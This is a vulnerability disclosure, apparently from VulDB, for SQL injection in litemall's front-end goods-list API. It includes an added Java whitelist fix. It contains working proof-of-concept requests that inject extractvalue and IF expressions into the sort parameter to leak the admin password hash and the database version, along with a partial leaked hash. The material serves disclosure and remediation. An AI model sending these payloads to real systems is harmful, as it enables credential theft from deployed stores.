Submission #811467: linlinjava litemall up to 1.8.0 SQL Injection

Information

Title: linlinjava litemall up to 1.8.0 SQL Injection
Description: A critical vulnerability was found in linlinjava litemall (https://github.com/linlinjava/litemall) up to 1.8.0. This vulnerability affects the list function of WxGoodsController.java in the front-end WeChat API. The manipulation of the argument sort/order leads to SQL injection.

IMPORTANT: Unlike previously reported CVEs (CVE-2024-24323, CVE-2024-46382) which require ADMIN authentication via Shiro, this vulnerability exists in the front-end API (/wx/goods/list) which is accessible to REGULAR USERS without admin privileges. This makes it significantly more severe (CVSS 8.8 vs 7.2).

Vulnerable code in WxGoodsController.java:
    @GetMapping("list")
    public Object list(@RequestParam(defaultValue="add_time") String sort, @RequestParam(defaultValue="desc") String order, ...)

LitemallGoodsService.java line 121-122:
    if (!StringUtils.isEmpty(sort) && !StringUtils.isEmpty(order)) { example.setOrderByClause(sort + " " + order); }

MyBatis: order by ${orderByClause}

No @Sort whitelist annotation is applied to WxGoodsController.

PoC 1 - Extract admin password hash from FRONT-END (no admin auth required):
    GET /wx/goods/list?sort=extractvalue(1,concat(0x7e,(SELECT password FROM litemall_admin LIMIT 1),0x7e))&order=asc&page=1&limit=10
    Response error: XPATH syntax error: '~$2a$10$.rEfyBb/GURD9P2p0fRg/OAJ'
Admin bcrypt hash leaked from front-end API!

PoC 2 - Extract MySQL version:
    GET /wx/goods/list?sort=extractvalue(1,concat(0x7e,version(),0x7e))&order=asc
    Response error: XPATH syntax error: '~8.0.45~'

PoC 3 - Boolean-based blind:
    GET /wx/goods/list?sort=IF(1=1,id,name)&order=asc -> sorted by id
    GET /wx/goods/list?sort=IF(1=2,id,name)&order=asc -> sorted by name
Different order confirms injection.

Comparison: CVE-2024-24323/CVE-2024-46382 require admin Shiro session. THIS vulnerability requires only regular user auth or no auth at all.

Reporter: berna ([email protected])
Source: https://gist.github.com/A1AAAAAAAAAA1/ab8df4181f9311cb9e7dad905e9aa512
User: berna (UID 97558)
Submitted: 23/04/2026 04:38 PM (1 month ago)
Moderation: 17/05/2026 11:36 AM (24 days later)
Status: Approved
VulDB Entry: 364396 [linlinjava litemall up to 1.8.0 Front-end WeChat API WxGoodsController.java list SQL Injection]
Points: 20
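The root cause named in the submission is that user-supplied sort and order values reach a MyBatis `order by ${orderByClause}` substitution unchanged, while the admin controllers get a @Sort whitelist and the front-end controller does not. The following is an added example of the kind of whitelist the front-end path is missing; it is not litemall's own code, and the column names, the `OrderByGuard` class and its `orderByClause` method are assumptions made for illustration. The idea generalizes beyond this controller: any `${}` substitution in MyBatis is string interpolation, so the only safe inputs to it are values the server chose from a fixed set.

```java
import java.util.Locale;
import java.util.Map;
import java.util.Set;

// Added example, not litemall's code. Maps client-facing sort keys to
// server-chosen column names and restricts the direction to asc/desc,
// so the string handed to example.setOrderByClause(...) can never
// contain anything a client typed.
public final class OrderByGuard {

    // Assumed column names for the goods table; the request never
    // supplies a column directly, only one of these keys.
    private static final Map<String, String> SORT_COLUMNS = Map.of(
        "add_time",     "add_time",
        "retail_price", "retail_price",
        "name",         "name"
    );

    private static final Set<String> ORDERS = Set.of("asc", "desc");

    private static final String DEFAULT_SORT = "add_time";
    private static final String DEFAULT_ORDER = "desc";

    private OrderByGuard() {}

    /**
     * Returns a safe "column direction" clause, or throws if either
     * parameter is not on the whitelist. Rejecting (rather than silently
     * falling back) makes probing attempts visible in application logs.
     */
    public static String orderByClause(String sort, String order) {
        String key = (sort == null || sort.isEmpty()) ? DEFAULT_SORT : sort;
        String column = SORT_COLUMNS.get(key);
        if (column == null) {
            throw new IllegalArgumentException("unsupported sort key");
        }

        String dir = (order == null || order.isEmpty())
            ? DEFAULT_ORDER
            : order.toLowerCase(Locale.ROOT);
        if (!ORDERS.contains(dir)) {
            throw new IllegalArgumentException("unsupported order");
        }

        // Both parts are now server-owned constants; this is the only
        // string that should ever reach order by ${orderByClause}.
        return column + " " + dir;
    }

    public static void main(String[] args) {
        // Legitimate request values pass through unchanged.
        System.out.println(orderByClause("retail_price", "ASC")); // retail_price asc
        System.out.println(orderByClause(null, null));            // add_time desc

        // A constructed value of the shape described in the submission
        // (a function call in place of a column) is rejected before any
        // SQL is built, instead of being interpolated into ORDER BY.
        try {
            orderByClause("IF(1=1,id,name)", "asc");
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());      // rejected: unsupported sort key
        }
    }
}
```

In a Spring controller the validated string, not the raw request parameters, is what gets passed to `example.setOrderByClause(...)`; the `${}` substitution in the mapper can stay as long as nothing but the guard's return value ever flows into it. Logging the `IllegalArgumentException` path gives a cheap detection signal for attempts like the ones in the submission.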
